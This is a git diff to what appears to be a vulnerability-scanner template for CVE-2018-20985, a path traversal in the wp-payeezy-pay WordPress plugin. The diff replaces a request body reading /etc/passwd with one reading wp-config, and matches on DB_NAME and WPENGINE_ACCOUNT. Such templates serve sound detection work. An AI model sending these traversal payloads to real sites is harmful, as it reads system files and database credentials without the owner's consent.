diff --git a/cves/2018/CVE-2018-20985.yaml b/cves/2018/CVE-2018-20985.yaml
index 1088abcea7..f4865b0ee7 100644
--- a/cves/2018/CVE-2018-20985.yaml
+++ b/cves/2018/CVE-2018-20985.yaml
@@ -15,15 +15,15 @@ requests:
     path:
       - "{{BaseURL}}/wp-content/plugins/wp-payeezy-pay/donate.php"
 
-    body: "x_login=../../../etc/passwd"
+    body: "x_login=../../../../wp-config"
 
     matchers-condition: and
     matchers:
-
-      - type: regex
-        regex:
-          - "root:[x*]:0:0"
-
+      - type: word
+        words:
+          - DB_NAME
+          - WPENGINE_ACCOUNT
+        part: body
       - type: status
         status:
           - 200